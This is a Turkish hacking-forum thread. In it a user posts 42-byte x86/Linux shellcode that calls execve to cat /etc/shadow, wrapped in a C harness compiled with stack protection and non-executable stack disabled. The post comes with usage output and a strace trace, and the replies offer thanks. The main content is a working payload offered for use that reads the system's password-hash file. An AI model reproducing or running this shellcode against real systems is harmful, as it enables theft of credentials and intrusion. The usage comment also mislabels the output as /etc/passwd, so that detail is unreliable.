Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.



x86/Linux execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) Shellcode

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 15-08-2016 10:23   #1
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
07/2016
Nereden
Assembly
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 3


x86/Linux execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) Shellcode



#Gecmise Donus \w xd3.
(Son: 2)



Kod:
/*
 *             ::execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) Shellcode
 *   __author__: xd3
 *     __date__: 15/9/22
 *   __format__: ELF 32 Bit
 * __platform__: x86/Linux
 *     __size__: 42 Bytes
 *    
 */
 
 /* Usage:
  * 
  * # gcc -fno-stack-protector -z execstack xd3.c -o xd3
  * # ./xd3
  * [~] Byte-Code Len: 42
  * .. $(cat /etc/passwd) output
  * #
  */

#include <stdio.h>
#include <string.h>

const unsigned char xd3[] = \
"\x6a\x0b\x58\x99\x52\x68"
"\x61\x64\x6f\x77\x68\x63"
"\x2f\x73\x68\x68\x2f\x2f"
"\x65\x74\x89\xe1\x52\x68"
"\x2f\x63\x61\x74\x68\x2f"
"\x62\x69\x6e\x89\xe3\x52"
"\x51\x53\x89\xe1\xcd\x80";


int main(){ 
    printf("[~] Byte-Code Len: %d\n", strlen(xd3));
    int (*sh3llc0de)();
    sh3llc0de = (int (*)()) xd3;
    (int)(*sh3llc0de)();
}


Soru & Cevap
Alıntı:
DarkmeteR´isimli üyeden Alıntı Mesajı göster
Bu nedir öğretirseniz sevinirim :0.
Bu tam olarak, Linux cekirdegi tabanli dagitimlarda yer alan, kullaniciya ozel bilgileri iceren (K. Adi, bitis tarihi, sifre..) "/etc/shadow" dosyasini okuyan bir bayt kodudur. Yapi olarak 11 numarali sistem cagrisini kullanarak (execve) argumanlari calistirir (/bin/cat, [/bin/cat, /etc//shadow], NULL). En genel tanimi ile bayt kodu, mimarisi onceden belirli makine talimatlaridir. Bayt anlaminda kucuk olmasi bunu ozel yapar. Sorun su ki, disassembly yapilmadigi surece pek okunabilir degildir, ayrica sifrelenmis olabilir. Bu sebeple kotu amacli birisi bayt kodu ayagina sizi kendi cikarlarinca kullanabilir. Her kaynaktaki bayt kodlarini dikkate almayiniz.

$ strace ./xd3
..
execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) = 0
..



Konu 22a02 tarafından (15-08-2016 10:39 Saat 10:39 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Hacknology Teşekkür etti.
Alt 15-08-2016 10:29   #2
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
01/2015
Nereden
Eskişehir
Yaş
18
Mesajlar
Konular

Teşekkür (Etti): 236
Teşekkür (Aldı): 46




Tamam bıraz arastırmayla buldum :0 "shellcode" elınıze saglık.



___________________________________________

/ ____\_____ ____________ __| _/_____ ___.__.
\ __\ \__ \ \ / __ | \__ \ < | |
| | / \_| \// __ \_/ /_// __ __ |
|__ (____ /|__| (____ /\____ | (____ // ____|
/


Konu DarkmeteR tarafından (15-08-2016 10:33 Saat 10:33 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 15-08-2016 10:30   #3
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
10/2015
Nereden
rm -rf /
Mesajlar
Konular

Teşekkür (Etti): 946
Teşekkür (Aldı): 1226




Ellerine sağlık



___________________________________________

I surrender my soul
Odin hear my call

flag{Bur4si_b1r_0yun_park1}

hacknology@hacknologyroot:~/
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau